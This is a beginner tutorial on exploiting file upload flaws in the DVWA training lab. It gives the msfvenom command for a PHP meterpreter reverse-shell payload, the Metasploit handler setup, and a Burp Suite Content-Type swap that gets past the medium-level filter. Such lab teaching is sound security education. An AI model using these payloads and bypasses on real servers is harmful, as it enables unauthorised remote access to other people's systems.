top of page

Beginners guide to file upload vulnerability

In this article we will learn about file upload vulnerability and how we can use this vulnerability to get a session.


Table of content :

  1. Introduction

  2. Practical implementation on DVWA

Introduction

file upload vulnerability is a web based vulnerability that allows attackers to upload a malicious file directly and then and execute it via a web browser. In this article we will try this vulnerability on DVWA at different security levels and will try to get a session by executing the malicious file.


Practical implementation on DVWA


We will start with the low security level.open DVWA and then go to DVWA Security then select it as Low, then go to the file upload tab.

As we can see in the image that it is asking us to upload a file . So let's create our malicious file by using msfvenom.

command used : msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.9 lport=4444 -o /root/Desktop/haclabs.php

  • -p means payload to use

  • lhost is the listener address

  • lport is the listener port

  • -o is used to specify the path to save the file

Now choose the file and click on upload button.

we have uploaded the file successfully and ../ ../hackable/uploads/haclabs.php

is the path where the file is uploaded. We will use this path to execute our script.

But before that open metasploit and setup everything to get a session.

command used :

  • use exploit/multi/handler

  • set payload php/meterpreter/reverse_tcp

  • set lhost 192.168.43.9

  • set lport 4444

  • exploit

please change lhost and lport according to the ip address and port number you have provided while creating the mailicious php file.


now its time to execute the uploaded file .

copy and paste the path ../ ../hackable/uploads/haclabs.php in the URL and press enter.

We have a session and this is what we want.


Now change the security level to medium and by we will use the same php file to uplaod and to get the session.

Ok so after changing to medium level go to File upload tab and try to upload the same php file .

This time we failed to upload the file. we only accept JPEG or PNG images.

No problem , open burpsuite and intercept the request when we click on upload button.

Now change Content-Type : application/x-php to Content-Type : image/jpeg and click on Forward and then we can see file is uploaded.

after uploading the file we followed the same steps to get a session .